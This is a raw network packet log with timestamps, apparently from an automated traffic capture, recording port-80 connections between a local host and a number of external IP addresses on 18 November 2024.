                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:53.647139072 CET5014180192.168.2.103.94.10.34
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:53.652616978 CET80501413.94.10.34192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:53.653062105 CET5014180192.168.2.103.94.10.34
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:53.668936968 CET5014380192.168.2.1035.164.78.200
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:53.673851967 CET805014335.164.78.200192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:53.673937082 CET5014380192.168.2.1035.164.78.200
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:53.675445080 CET5014380192.168.2.1035.164.78.200
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:53.675463915 CET5014380192.168.2.1035.164.78.200
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:53.680320978 CET805014335.164.78.200192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:53.680362940 CET805014335.164.78.200192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:54.496079922 CET805014335.164.78.200192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:54.496272087 CET5014380192.168.2.1035.164.78.200
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:54.501718044 CET805014335.164.78.200192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:54.502439022 CET5014380192.168.2.1035.164.78.200
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:54.513170004 CET5014480192.168.2.1018.141.10.107
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:54.517999887 CET805014418.141.10.107192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:54.521909952 CET5014480192.168.2.1018.141.10.107
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:54.521909952 CET5014480192.168.2.1018.141.10.107
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:54.521909952 CET5014480192.168.2.1018.141.10.107
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:54.526963949 CET805014418.141.10.107192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:54.527050018 CET805014418.141.10.107192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:54.813333035 CET805014247.129.31.212192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:54.813613892 CET5014280192.168.2.1047.129.31.212
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:54.819188118 CET805014247.129.31.212192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:54.819291115 CET5014280192.168.2.1047.129.31.212
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:54.838977098 CET5014580192.168.2.1013.251.16.150
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:54.843978882 CET805014513.251.16.150192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:54.844269037 CET5014580192.168.2.1013.251.16.150
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:54.873666048 CET5014580192.168.2.1013.251.16.150
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:54.873718023 CET5014580192.168.2.1013.251.16.150
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:54.878757000 CET805014513.251.16.150192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:54.878772020 CET805014513.251.16.150192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:55.455624104 CET5014580192.168.2.1013.251.16.150
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:55.475100994 CET5014680192.168.2.1013.251.16.150
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:55.480722904 CET805014613.251.16.150192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:55.480818033 CET5014680192.168.2.1013.251.16.150
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:55.492233992 CET5014680192.168.2.1013.251.16.150
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:55.492249012 CET5014680192.168.2.1013.251.16.150
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:55.497386932 CET805014613.251.16.150192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:55.497404099 CET805014613.251.16.150192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:55.981547117 CET805014418.141.10.107192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:55.992321968 CET5014480192.168.2.1018.141.10.107
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:55.998111963 CET805014418.141.10.107192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:55.998167992 CET5014480192.168.2.1018.141.10.107
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:56.009902000 CET5005980192.168.2.10208.100.26.245
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:56.009916067 CET5005980192.168.2.10208.100.26.245
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:56.015166998 CET8050059208.100.26.245192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:56.015178919 CET8050059208.100.26.245192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:56.164326906 CET8050059208.100.26.245192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:56.177228928 CET5005980192.168.2.10208.100.26.245
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:56.180711985 CET5005980192.168.2.10208.100.26.245
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:56.183346987 CET8050059208.100.26.245192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:56.185586929 CET8050059208.100.26.245192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:56.325150967 CET8050059208.100.26.245192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:56.338661909 CET5014780192.168.2.1044.221.84.105
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:56.344541073 CET805014744.221.84.105192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:56.344681978 CET5014780192.168.2.1044.221.84.105
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:56.344681978 CET5014780192.168.2.1044.221.84.105
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:56.344717979 CET5014780192.168.2.1044.221.84.105
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:56.349931955 CET805014744.221.84.105192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:56.350023985 CET805014744.221.84.105192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:56.371470928 CET5005980192.168.2.10208.100.26.245
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:56.924932957 CET805014613.251.16.150192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:56.980844021 CET5014680192.168.2.1013.251.16.150
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:57.005778074 CET5014680192.168.2.1013.251.16.150
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:57.007216930 CET805014744.221.84.105192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:57.008411884 CET5014780192.168.2.1044.221.84.105
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:57.013520002 CET805014613.251.16.150192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:57.013717890 CET5014680192.168.2.1013.251.16.150
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:57.013748884 CET805014744.221.84.105192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:57.013920069 CET5014780192.168.2.1044.221.84.105
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:57.374914885 CET5014880192.168.2.1018.208.156.248
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:57.376118898 CET5014980192.168.2.1034.211.97.45
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:57.379882097 CET805014818.208.156.248192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:57.379957914 CET5014880192.168.2.1018.208.156.248
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:57.381083012 CET805014934.211.97.45192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:57.381160975 CET5014980192.168.2.1034.211.97.45
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:57.389431953 CET5014880192.168.2.1018.208.156.248
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:57.389458895 CET5014880192.168.2.1018.208.156.248
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:57.394412994 CET805014818.208.156.248192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:57.394440889 CET805014818.208.156.248192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:57.395118952 CET5014980192.168.2.1034.211.97.45
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:57.395137072 CET5014980192.168.2.1034.211.97.45
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:57.399956942 CET805014934.211.97.45192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:57.400355101 CET805014934.211.97.45192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:58.052541971 CET805014818.208.156.248192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:58.052714109 CET5014880192.168.2.1018.208.156.248
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:58.058187962 CET805014818.208.156.248192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:58.058238029 CET5014880192.168.2.1018.208.156.248
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:58.067169905 CET5015080192.168.2.1044.221.84.105
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:58.072017908 CET805015044.221.84.105192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:58.072099924 CET5015080192.168.2.1044.221.84.105
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:58.072249889 CET5015080192.168.2.1044.221.84.105
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:58.072278023 CET5015080192.168.2.1044.221.84.105
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:58.077054977 CET805015044.221.84.105192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:58.077080011 CET805015044.221.84.105192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:58.213303089 CET805014934.211.97.45192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:58.213464975 CET5014980192.168.2.1034.211.97.45
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:58.218748093 CET805014934.211.97.45192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:58.218805075 CET5014980192.168.2.1034.211.97.45
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:58.259948969 CET5015180192.168.2.1018.208.156.248
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:58.265099049 CET805015118.208.156.248192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:58.265213966 CET5015180192.168.2.1018.208.156.248
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:58.265409946 CET5015180192.168.2.1018.208.156.248
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:58.265423059 CET5015180192.168.2.1018.208.156.248
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:58.270338058 CET805015118.208.156.248192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:58.270380020 CET805015118.208.156.248192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:58.735431910 CET805015044.221.84.105192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:58.735692024 CET5015080192.168.2.1044.221.84.105
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:58.746187925 CET805015044.221.84.105192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:58.746239901 CET5015080192.168.2.1044.221.84.105
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:58.799119949 CET5015280192.168.2.1018.208.156.248
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:58.804164886 CET805015218.208.156.248192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:58.804239988 CET5015280192.168.2.1018.208.156.248
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:58.805938005 CET5015280192.168.2.1018.208.156.248
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:58.805957079 CET5015280192.168.2.1018.208.156.248
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:58.810851097 CET805015218.208.156.248192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:58.810864925 CET805015218.208.156.248192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:58.959619045 CET805015118.208.156.248192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:58.959831953 CET5015180192.168.2.1018.208.156.248
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:58.965307951 CET805015118.208.156.248192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:58.965359926 CET5015180192.168.2.1018.208.156.248
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:59.027106047 CET5015380192.168.2.103.254.94.185
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:59.032128096 CET80501533.254.94.185192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:59.032202005 CET5015380192.168.2.103.254.94.185
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:59.032356977 CET5015380192.168.2.103.254.94.185
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:59.032386065 CET5015380192.168.2.103.254.94.185
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:59.037266970 CET80501533.254.94.185192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:59.037328959 CET80501533.254.94.185192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:59.449935913 CET5015280192.168.2.1018.208.156.248
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:59.451904058 CET5015480192.168.2.1018.208.156.248
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:59.456976891 CET805015418.208.156.248192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:59.457781076 CET5015480192.168.2.1018.208.156.248
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:59.458199978 CET5015480192.168.2.1018.208.156.248
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:59.458261967 CET5015480192.168.2.1018.208.156.248
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:59.463136911 CET805015418.208.156.248192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:59.463162899 CET805015418.208.156.248192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:00.011337996 CET80501533.254.94.185192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:00.032314062 CET5015380192.168.2.103.254.94.185
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:00.037532091 CET80501533.254.94.185192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:00.037585020 CET5015380192.168.2.103.254.94.185
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:00.124043941 CET805015418.208.156.248192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:00.149126053 CET5015580192.168.2.1054.244.188.177
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:00.149313927 CET5015480192.168.2.1018.208.156.248
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:00.154268980 CET805015554.244.188.177192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:00.154366970 CET5015580192.168.2.1054.244.188.177
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:00.155018091 CET5015580192.168.2.1054.244.188.177
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:00.155039072 CET5015580192.168.2.1054.244.188.177
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:00.160276890 CET805015554.244.188.177192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:00.160424948 CET805015554.244.188.177192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:00.163526058 CET805015418.208.156.248192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:00.163609982 CET5015480192.168.2.1018.208.156.248
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:00.269988060 CET5015680192.168.2.1047.129.31.212
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:00.275033951 CET805015647.129.31.212192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:00.275259018 CET5015680192.168.2.1047.129.31.212
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:00.275600910 CET5015680192.168.2.1047.129.31.212
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:00.275600910 CET5015680192.168.2.1047.129.31.212
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:00.280594110 CET805015647.129.31.212192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:00.281035900 CET805015647.129.31.212192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:00.992248058 CET805015554.244.188.177192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:00.995553017 CET5015580192.168.2.1054.244.188.177
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:01.000734091 CET805015554.244.188.177192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:01.000791073 CET5015580192.168.2.1054.244.188.177
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:01.032784939 CET5015780192.168.2.1054.244.188.177
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:01.037844896 CET805015754.244.188.177192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:01.037926912 CET5015780192.168.2.1054.244.188.177
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:01.038037062 CET5015780192.168.2.1054.244.188.177
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:01.038038015 CET5015780192.168.2.1054.244.188.177
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:01.043358088 CET805015754.244.188.177192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:01.043370962 CET805015754.244.188.177192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:01.745206118 CET805015647.129.31.212192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:01.747334003 CET5015680192.168.2.1047.129.31.212
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:01.752661943 CET805015647.129.31.212192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:01.753761053 CET5015680192.168.2.1047.129.31.212
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:01.804932117 CET5015880192.168.2.1018.208.156.248
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:01.809957981 CET805015818.208.156.248192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:01.810144901 CET5015880192.168.2.1018.208.156.248
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:01.810441971 CET5015880192.168.2.1018.208.156.248
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:01.810523987 CET5015880192.168.2.1018.208.156.248
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:01.815604925 CET805015818.208.156.248192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:01.815625906 CET805015818.208.156.248192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:01.878035069 CET805015754.244.188.177192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:01.882664919 CET5015780192.168.2.1054.244.188.177
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:01.888051987 CET805015754.244.188.177192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:01.888314962 CET5015780192.168.2.1054.244.188.177
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:02.092354059 CET5015980192.168.2.1018.246.231.120
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:02.097270966 CET805015918.246.231.120192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:02.097353935 CET5015980192.168.2.1018.246.231.120
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:02.097457886 CET5015980192.168.2.1018.246.231.120
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:02.097457886 CET5015980192.168.2.1018.246.231.120
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:02.102422953 CET805015918.246.231.120192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:02.102436066 CET805015918.246.231.120192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:02.867441893 CET805015818.208.156.248192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:02.904633045 CET805015818.208.156.248192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:02.905817032 CET5015880192.168.2.1018.208.156.248
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:02.940538883 CET805015918.246.231.120192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:02.980859995 CET5015980192.168.2.1018.246.231.120
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:03.047686100 CET5015880192.168.2.1018.208.156.248
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:03.048537970 CET5015980192.168.2.1018.246.231.120
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:03.053792953 CET805015818.208.156.248192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:03.054778099 CET805015918.246.231.120192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:03.054842949 CET5015980192.168.2.1018.246.231.120
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:03.068500042 CET5016080192.168.2.1054.244.188.177
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:03.071348906 CET5016180192.168.2.1018.208.156.248
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:03.075222969 CET805016054.244.188.177192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:03.075325966 CET5016080192.168.2.1054.244.188.177
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:03.077940941 CET805016118.208.156.248192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:03.078005075 CET5016180192.168.2.1018.208.156.248
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:03.082138062 CET5016080192.168.2.1054.244.188.177
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:03.082210064 CET5016080192.168.2.1054.244.188.177
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:03.082402945 CET5016180192.168.2.1018.208.156.248
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:03.082562923 CET5016180192.168.2.1018.208.156.248
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:03.089046001 CET805016054.244.188.177192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:03.089068890 CET805016054.244.188.177192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:03.091180086 CET805016118.208.156.248192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:03.091197968 CET805016118.208.156.248192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:03.449928045 CET5016080192.168.2.1054.244.188.177
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:03.451611996 CET5016280192.168.2.1054.244.188.177
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:03.729772091 CET805016254.244.188.177192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:03.729859114 CET5016280192.168.2.1054.244.188.177
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:03.732058048 CET5016280192.168.2.1054.244.188.177
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:03.732081890 CET5016280192.168.2.1054.244.188.177
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:03.736932039 CET805016254.244.188.177192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:03.736958981 CET805016254.244.188.177192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:03.751807928 CET805016118.208.156.248192.168.2.10
